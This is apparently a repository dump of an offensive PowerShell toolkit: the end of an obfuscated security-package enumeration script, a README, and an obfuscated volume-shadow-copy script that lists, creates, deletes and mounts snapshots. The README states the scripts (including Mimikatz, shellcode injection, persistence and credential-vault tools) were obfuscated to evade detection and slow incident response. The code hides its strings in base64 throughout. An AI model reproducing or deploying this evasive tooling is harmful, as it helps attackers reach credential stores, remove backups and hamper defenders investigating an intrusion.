${fe4d7ca4026e47f3b620ed1e74c0e37a}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQA='))), $False) 580 | ${1897ccfb3dd24fdda7662936eb2b8060} = [FlagsAttribute].GetConstructor(@()) 581 | ${dae4b3ac19a04fdbad9eed698a036e31} = New-Object Reflection.Emit.CustomAttributeBuilder(${1897ccfb3dd24fdda7662936eb2b8060}, @()) 582 | ${2a6b61d5404b4a36899cdae620046f62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA='))) 583 | ${d09bb55ff972413ead29f35f8a7f48b0} = ${ac678682e4f149bfafb1b16e8d88c398}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAuAFMARQBDAFAASwBHAF8ARgBMAEEARwA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [Int32]) 584 | ${d09bb55ff972413ead29f35f8a7f48b0}.SetCustomAttribute(${dae4b3ac19a04fdbad9eed698a036e31}) 585 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBOAFQARQBHAFIASQBUAFkA'))), 1) 586 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABSAEkAVgBBAEMAWQA='))), 2) 587 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABPAEsARQBOAF8ATwBOAEwAWQA='))), 4) 588 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABBAFQAQQBHAFIAQQBNAA=='))), 8) 589 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBPAE4ATgBFAEMAVABJAE8ATgA='))), 0x10) 590 | $null = 
${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBVAEwAVABJAF8AUgBFAFEAVQBJAFIARQBEAA=='))), 0x20) 591 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBMAEkARQBOAFQAXwBPAE4ATABZAA=='))), 0x40) 592 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAFQARQBOAEQARQBEAF8ARQBSAFIATwBSAA=='))), 0x80) 593 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAFAARQBSAFMATwBOAEEAVABJAE8ATgA='))), 0x100) 594 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBDAEMARQBQAFQAXwBXAEkATgAzADIAXwBOAEEATQBFAA=='))), 0x200) 595 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBUAFIARQBBAE0A'))), 0x400) 596 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBFAEcATwBUAEkAQQBCAEwARQA='))), 0x800) 597 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBTAFMAXwBDAE8ATQBQAEEAVABJAEIATABFAA=='))), 0x1000) 598 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABPAEcATwBOAA=='))), 0x2000) 599 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBTAEMASQBJAF8AQgBVAEYARgBFAFIAUwA='))), 0x4000) 600 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBSAEEARwBNAEUATgBUAA=='))), 0x8000) 601 | $null = 
${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBVAFQAVQBBAEwAXwBBAFUAVABIAA=='))), 0x10000) 602 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABFAEwARQBHAEEAVABJAE8ATgA='))), 0x20000) 603 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAEEARABPAE4ATABZAF8AVwBJAFQASABfAEMASABFAEMASwBTAFUATQA='))), 0x40000) 604 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAVABSAEkAQwBUAEUARABfAFQATwBLAEUATgBTAA=='))), 0x80000) 605 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBFAEcATwBfAEUAWABUAEUATgBEAEUAUgA='))), 0x100000) 606 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBFAEcATwBUAEkAQQBCAEwARQAyAA=='))), 0x200000) 607 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBQAFAAQwBPAE4AVABBAEkATgBFAFIAXwBQAEEAUwBTAFQASABSAE8AVQBHAEgA'))), 0x400000) 608 | $null = ${d09bb55ff972413ead29f35f8a7f48b0}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBQAFAAQwBPAE4AVABBAEkATgBFAFIAXwBDAEgARQBDAEsAUwA='))), 0x800000) 609 | ${845747684be04a1c8f756bf8fe82d800} = ${d09bb55ff972413ead29f35f8a7f48b0}.CreateType() 610 | ${45b97198ae354124831731ef24c92007} = ${ac678682e4f149bfafb1b16e8d88c398}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAuAFMAZQBjAFAAawBnAEkAbgBmAG8A'))), ${2a6b61d5404b4a36899cdae620046f62}, [Object], [Reflection.Emit.PackingSize]::Size8) 611 | $null = 
${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZgBDAGEAcABhAGIAaQBsAGkAdABpAGUAcwA='))), ${845747684be04a1c8f756bf8fe82d800}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 612 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwBWAGUAcgBzAGkAbwBuAA=='))), [Int16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 613 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwBSAFAAQwBJAEQA'))), [Int16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 614 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwBiAE0AYQB4AFQAbwBrAGUAbgA='))), [Int32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 615 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAG0AZQA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 616 | $null = ${45b97198ae354124831731ef24c92007}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAG0AbQBlAG4AdAA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 617 | ${51c48e6f503547d5a1af31028b97d2a5} = ${45b97198ae354124831731ef24c92007}.CreateType() 618 | ${45b97198ae354124831731ef24c92007} = ${ac678682e4f149bfafb1b16e8d88c398}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAuAFMAZQBjAHUAcgAzADIA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEMAbABhAHMAcwA=')))) 619 | ${3a0d90aa783842659ba2918c88428ef3} = 
${45b97198ae354124831731ef24c92007}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBuAHUAbQBlAHIAYQB0AGUAUwBlAGMAdQByAGkAdAB5AFAAYQBjAGsAYQBnAGUAcwA='))), 620 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGMAdQByADMAMgAuAGQAbABsAA=='))), 621 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 622 | [Reflection.CallingConventions]::Standard, 623 | [Int32], 624 | [Type[]] @([Int32].MakeByRefType(), 625 | [IntPtr].MakeByRefType()), 626 | [Runtime.InteropServices.CallingConvention]::Winapi, 627 | [Runtime.InteropServices.CharSet]::Ansi) 628 | ${036a3cc75ce04b6e8c8f0f3f43bb1521} = ${45b97198ae354124831731ef24c92007}.CreateType() 629 | ${2136db02e44f4de8a5c7f94b1c3e1b30} = 0 630 | ${8d0c3967fbd946f4922a42c273f3fcb8} = [IntPtr]::Zero 631 | ${8d8d49797b5b494095bad3098d94ec73} = ${036a3cc75ce04b6e8c8f0f3f43bb1521}::EnumerateSecurityPackages([Ref] ${2136db02e44f4de8a5c7f94b1c3e1b30}, [Ref] ${8d0c3967fbd946f4922a42c273f3fcb8}) 632 | if (${8d8d49797b5b494095bad3098d94ec73} -ne 0) 633 | { 634 | throw "Unable to enumerate seucrity packages. 
Error (0x$(${8d8d49797b5b494095bad3098d94ec73}.ToString('X8')))" 635 | } 636 | if (${2136db02e44f4de8a5c7f94b1c3e1b30} -eq 0) 637 | { 638 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABoAGUAcgBlACAAYQByAGUAIABuAG8AIABpAG4AcwB0AGEAbABsAGUAZAAgAHMAZQBjAHUAcgBpAHQAeQAgAHAAYQBjAGsAYQBnAGUAcwAuAA=='))) 639 | return 640 | } 641 | ${4d58aec7546049d28371ff982f0e2c58} = ${8d0c3967fbd946f4922a42c273f3fcb8} 642 | foreach ($i in 1..${2136db02e44f4de8a5c7f94b1c3e1b30}) 643 | { 644 | ${9e676a9cf4a647668f2fc350c23da73c} = [Runtime.InteropServices.Marshal]::PtrToStructure(${4d58aec7546049d28371ff982f0e2c58}, [Type] ${51c48e6f503547d5a1af31028b97d2a5}) 645 | ${4d58aec7546049d28371ff982f0e2c58} = [IntPtr] (${4d58aec7546049d28371ff982f0e2c58}.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] ${51c48e6f503547d5a1af31028b97d2a5})) 646 | ${fbef978007bd41f7b91c557d1c93d266} = $null 647 | if (${9e676a9cf4a647668f2fc350c23da73c}.Name -ne [IntPtr]::Zero) 648 | { 649 | ${fbef978007bd41f7b91c557d1c93d266} = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(${9e676a9cf4a647668f2fc350c23da73c}.Name) 650 | } 651 | ${11587f86c7d64252820518c462df8ed0} = $null 652 | if (${9e676a9cf4a647668f2fc350c23da73c}.Comment -ne [IntPtr]::Zero) 653 | { 654 | ${11587f86c7d64252820518c462df8ed0} = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(${9e676a9cf4a647668f2fc350c23da73c}.Comment) 655 | } 656 | ${c0c8f88f6219441b8f0353b4b6743577} = @{ 657 | Name = ${fbef978007bd41f7b91c557d1c93d266} 658 | Comment = ${11587f86c7d64252820518c462df8ed0} 659 | Capabilities = ${9e676a9cf4a647668f2fc350c23da73c}.fCapabilities 660 | MaxTokenSize = ${9e676a9cf4a647668f2fc350c23da73c}.cbMaxToken 661 | } 662 | ${ab7e17eb066b4e0cb4ce12583adc5c8b} = New-Object PSObject -Property ${c0c8f88f6219441b8f0353b4b6743577} 663 | ${ab7e17eb066b4e0cb4ce12583adc5c8b}.PSObject.TypeNames[0] = 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEMAVQBSADMAMgAuAFMARQBDAFAASwBHAEkATgBGAE8A'))) 664 | ${ab7e17eb066b4e0cb4ce12583adc5c8b} 665 | } 666 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | PS-1 Toolkit 2 | ============ 3 | 4 | This is a set of PowerShell scripts that are used by many penetration testers released by multiple leading professionals. This is simply a collection of scripts that are prepared and obfuscated to reduce level of detectability and to slow down incident response from understanding the actions performed by an attacker. 5 | 6 | I did not write any of these, I merely performed the obfuscation process on them. Refer to the respective repositories for updates, credit and documentation on usage. 7 | 8 | As we often hear the term "defense in depth" quite often, this could be thought of as "hide in depth" from an attackers perspective. It may not be quiet, but each step we add into the process to make it more difficult for IR, the better. It allows us to add sophistication to really test cyber defenses for organizations to help then improve. 9 | 10 | Obfuscator: http://www.powertheshell.com/isesteroids2-2/ordering-isesteroids/ 11 | 12 | PowerSploit 13 | =========== 14 | https://github.com/PowerShellMafia/PowerSploit/
15 | 16 | Get-VaultCredential
17 | Invoke-GPPPassword
18 | Invoke-Mimikatz
19 | Invoke-NinjaCopy
20 | Invoke-ReflectivePEInjection
21 | Invoke-Shellcode
22 | Invoke-WmiCommand
23 | Persistence
24 | VolumeShadowCopyTools
25 | 26 | PowerTools 27 | ========== 28 | https://github.com/Veil-Framework/PowerTools 29 | 30 | PowerUp
31 | PowerView
32 | 33 | Inveigh 34 | ======= 35 | https://github.com/Kevin-Robertson/Inveigh 36 | 37 | Inveigh
38 | Inveigh-Relay
39 | Inveigh-BruteForce
40 | -------------------------------------------------------------------------------- /VolumeShadowCopyTools.ps1: -------------------------------------------------------------------------------- 1 | function Get-VolumeShadowCopy 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Lists the device paths of all local volume shadow copies. 7 | 8 | PowerSploit Function: Get-VolumeShadowCopy 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | #> 14 | ${83f9ee88d8954f24b68d6b55e6939fcf} = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) 15 | if (-not ${83f9ee88d8954f24b68d6b55e6939fcf}.IsInRole([Security.Principal.WindowsBuiltInRole]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA='))))) 16 | { 17 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIABHAGUAdAAtAFYAbwBsAHUAbQBlAFMAaABhAGQAbwB3AEMAbwBwAHkAIABmAHIAbwBtACAAYQBuACAAZQBsAGUAdgBhAHQAZQBkACAAYwBvAG0AbQBhAG4AZAAgAHAAcgBvAG0AcAB0AC4A'))) 18 | } 19 | gwmi -Namespace root\cimv2 -Class Win32_ShadowCopy | % { $_.DeviceObject } 20 | } 21 | function New-VolumeShadowCopy 22 | { 23 | Param( 24 | [Parameter(Mandatory = $True)] 25 | [ValidatePattern('^\w:\\')] 26 | [String] 27 | ${e89ed31dbd63491c838e0d48707f3a3d}, 28 | [Parameter(Mandatory = $False)] 29 | [ValidateSet("ClientAccessible")] 30 | [String] 31 | ${d8e1cf8ac8274a41a641f08c00759624} = "ClientAccessible" 32 | ) 33 | ${83f9ee88d8954f24b68d6b55e6939fcf} = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) 34 | if (-not ${83f9ee88d8954f24b68d6b55e6939fcf}.IsInRole([Security.Principal.WindowsBuiltInRole]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA='))))) 35 | { 36 | Throw 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIABHAGUAdAAtAFYAbwBsAHUAbQBlAFMAaABhAGQAbwB3AEMAbwBwAHkAIABmAHIAbwBtACAAYQBuACAAZQBsAGUAdgBhAHQAZQBkACAAYwBvAG0AbQBhAG4AZAAgAHAAcgBvAG0AcAB0AC4A'))) 37 | } 38 | ${4780257d8a374310937b15028877a618} = (gsv -Name VSS).Status 39 | ${feb66c69d4724532bf70a30729489a3e} = [WMICLASS]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAGMAaQBtAHYAMgA6AHcAaQBuADMAMgBfAHMAaABhAGQAbwB3AGMAbwBwAHkA'))) 40 | ${44bb39c517ad4ac38d11950420929a61} = ${feb66c69d4724532bf70a30729489a3e}.create("${e89ed31dbd63491c838e0d48707f3a3d}", "${d8e1cf8ac8274a41a641f08c00759624}") 41 | switch(${44bb39c517ad4ac38d11950420929a61}.returnvalue) 42 | { 43 | 1 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBjAGMAZQBzAHMAIABkAGUAbgBpAGUAZAAuAA=='))); break} 44 | 2 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAGEAcgBnAHUAbQBlAG4AdAAuAA=='))); break} 45 | 3 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBwAGUAYwBpAGYAaQBlAGQAIAB2AG8AbAB1AG0AZQAgAG4AbwB0ACAAZgBvAHUAbgBkAC4A'))); break} 46 | 4 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBwAGUAYwBpAGYAaQBlAGQAIAB2AG8AbAB1AG0AZQAgAG4AbwB0ACAAcwB1AHAAcABvAHIAdABlAGQALgA='))); break} 47 | 5 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAHMAdQBwAHAAbwByAHQAZQBkACAAcwBoAGEAZABvAHcAIABjAG8AcAB5ACAAYwBvAG4AdABlAHgAdAAuAA=='))); break} 48 | 6 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHMAdQBmAGYAaQBjAGkAZQBuAHQAIABzAHQAbwByAGEAZwBlAC4A'))); break} 49 | 7 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGwAdQBtAGUAIABpAHMAIABpAG4AIAB1AHMAZQAuAA=='))); break} 50 | 8 {Write-Error 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAHgAaQBtAHUAbQAgAG4AdQBtAGIAZQByACAAbwBmACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHIAZQBhAGMAaABlAGQALgA='))); break} 51 | 9 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBuAG8AdABoAGUAcgAgAHMAaABhAGQAbwB3ACAAYwBvAHAAeQAgAG8AcABlAHIAYQB0AGkAbwBuACAAaQBzACAAYQBsAHIAZQBhAGQAeQAgAGkAbgAgAHAAcgBvAGcAcgBlAHMAcwAuAA=='))); break} 52 | 10 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGEAZABvAHcAIABjAG8AcAB5ACAAcAByAG8AdgBpAGQAZQByACAAdgBlAHQAbwBlAGQAIAB0AGgAZQAgAG8AcABlAHIAYQB0AGkAbwBuAC4A'))); break} 53 | 11 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGEAZABvAHcAIABjAG8AcAB5ACAAcAByAG8AdgBpAGQAZQByACAAbgBvAHQAIAByAGUAZwBpAHMAdABlAHIAZQBkAC4A'))); break} 54 | 12 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGEAZABvAHcAIABjAG8AcAB5ACAAcAByAG8AdgBpAGQAZQByACAAZgBhAGkAbAB1AHIAZQAuAA=='))); break} 55 | 13 {Write-Error $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGsAbgBvAHcAbgAgAGUAcgByAG8AcgAuAA=='))); break} 56 | default {break} 57 | } 58 | if(${4780257d8a374310937b15028877a618} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AG8AcABwAGUAZAA=')))) 59 | { 60 | spsv -Name VSS 61 | } 62 | } 63 | function Remove-VolumeShadowCopy 64 | { 65 | [CmdletBinding(SupportsShouldProcess = $True)] 66 | Param( 67 | [Parameter(Mandatory = $True, ValueFromPipeline = $True)] 68 | [ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')] 69 | [String] 70 | ${e4e586706d42432db96f566c36be403d} 71 | ) 72 | PROCESS 73 | { 74 | if($PSCmdlet.ShouldProcess("The VolumeShadowCopy at DevicePath ${e4e586706d42432db96f566c36be403d} will be removed")) 75 | { 76 | (gwmi -Namespace root\cimv2 -Class Win32_ShadowCopy | ? 
{$_.DeviceObject -eq ${e4e586706d42432db96f566c36be403d}}).Delete() 77 | } 78 | } 79 | } 80 | function Mount-VolumeShadowCopy 81 | { 82 | Param ( 83 | [Parameter(Mandatory = $True)] 84 | [ValidateNotNullOrEmpty()] 85 | [String] 86 | ${b226ae46a4884833bfb8db0ef02d3e00}, 87 | [Parameter(Mandatory = $True, ValueFromPipeline = $True)] 88 | [ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')] 89 | [String[]] 90 | ${e4e586706d42432db96f566c36be403d} 91 | ) 92 | BEGIN 93 | { 94 | ${83f9ee88d8954f24b68d6b55e6939fcf} = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) 95 | if (-not ${83f9ee88d8954f24b68d6b55e6939fcf}.IsInRole([Security.Principal.WindowsBuiltInRole]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA='))))) 96 | { 97 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIABHAGUAdAAtAFYAbwBsAHUAbQBlAFMAaABhAGQAbwB3AEMAbwBwAHkAIABmAHIAbwBtACAAYQBuACAAZQBsAGUAdgBhAHQAZQBkACAAYwBvAG0AbQBhAG4AZAAgAHAAcgBvAG0AcAB0AC4A'))) 98 | } 99 | ls ${b226ae46a4884833bfb8db0ef02d3e00} -ErrorAction Stop | Out-Null 100 | ${b1b1aba9dae94768bdc412a109806796} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBTAFMAVQB0AGkAbAA=')))) 101 | ${29faa606c8f24471920596f3410cf7b8} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${b1b1aba9dae94768bdc412a109806796}, [Reflection.Emit.AssemblyBuilderAccess]::Run) 102 | ${4542515b539e4ed5bde7ff54512d0814} = ${29faa606c8f24471920596f3410cf7b8}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBTAFMAVQB0AGkAbAA='))), $False) 103 | ${a4d92881f6dd44bbbb483c140489d796} = ${4542515b539e4ed5bde7ff54512d0814}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBTAFMALgBLAGUAcgBuAGUAbAAzADIA'))), 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEMAbABhAHMAcwA=')))) 104 | ${b4fd4dbc9c854e8189eb585c4174cc1a} = ${a4d92881f6dd44bbbb483c140489d796}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwByAGUAYQB0AGUAUwB5AG0AYgBvAGwAaQBjAEwAaQBuAGsA'))), 105 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA'))), 106 | ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), 107 | [Reflection.CallingConventions]::Standard, 108 | [Bool], 109 | [Type[]]@([String], [String], [UInt32]), 110 | [Runtime.InteropServices.CallingConvention]::Winapi, 111 | [Runtime.InteropServices.CharSet]::Auto) 112 | ${0e80b38d1c474dedaf867d557feda64c} = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) 113 | ${418b7351860040e882ef1847d703ccb4} = [Runtime.InteropServices.DllImportAttribute].GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHQATABhAHMAdABFAHIAcgBvAHIA')))) 114 | ${e3c67543c2ee4082a819b7bf7a3868ba} = New-Object Reflection.Emit.CustomAttributeBuilder(${0e80b38d1c474dedaf867d557feda64c}, 115 | @($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('awBlAHIAbgBlAGwAMwAyAC4AZABsAGwA')))), 116 | [Reflection.FieldInfo[]]@(${418b7351860040e882ef1847d703ccb4}), 117 | @($true)) 118 | ${b4fd4dbc9c854e8189eb585c4174cc1a}.SetCustomAttribute(${e3c67543c2ee4082a819b7bf7a3868ba}) 119 | ${79171bc3525f4b539968569680f9f24e} = ${a4d92881f6dd44bbbb483c140489d796}.CreateType() 120 | } 121 | PROCESS 122 | { 123 | foreach (${e89ed31dbd63491c838e0d48707f3a3d} in ${e4e586706d42432db96f566c36be403d}) 124 | { 125 | ${e89ed31dbd63491c838e0d48707f3a3d} -match 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBcAFwAXABcAFwAPwBcAFwARwBMAE8AQgBBAEwAUgBPAE8AVABcAFwARABlAHYAaQBjAGUAXABcACgAPwA8AEwAaQBuAGsATgBhAG0AZQA+AEgAYQByAGQAZABpAHMAawBWAG8AbAB1AG0AZQBTAGgAYQBkAG8AdwBDAG8AcAB5AFsAMAAtADkAXQB7ADEALAAzAH0AKQAkAA=='))) | Out-Null 126 | ${48dbab63fb76438c97049129a14e2b82} = Join-Path ${b226ae46a4884833bfb8db0ef02d3e00} $Matches.LinkName 127 | if (Test-Path ${48dbab63fb76438c97049129a14e2b82}) 128 | { 129 | Write-Warning "'${48dbab63fb76438c97049129a14e2b82}' already exists." 130 | continue 131 | } 132 | if (-not ${79171bc3525f4b539968569680f9f24e}::CreateSymbolicLink(${48dbab63fb76438c97049129a14e2b82}, "$(${e89ed31dbd63491c838e0d48707f3a3d})\", 1)) 133 | { 134 | Write-Error "Symbolic link creation failed for '${e89ed31dbd63491c838e0d48707f3a3d}'." 135 | continue 136 | } 137 | gi ${48dbab63fb76438c97049129a14e2b82} 138 | } 139 | } 140 | END 141 | { 142 | } 143 | } 144 | --------------------------------------------------------------------------------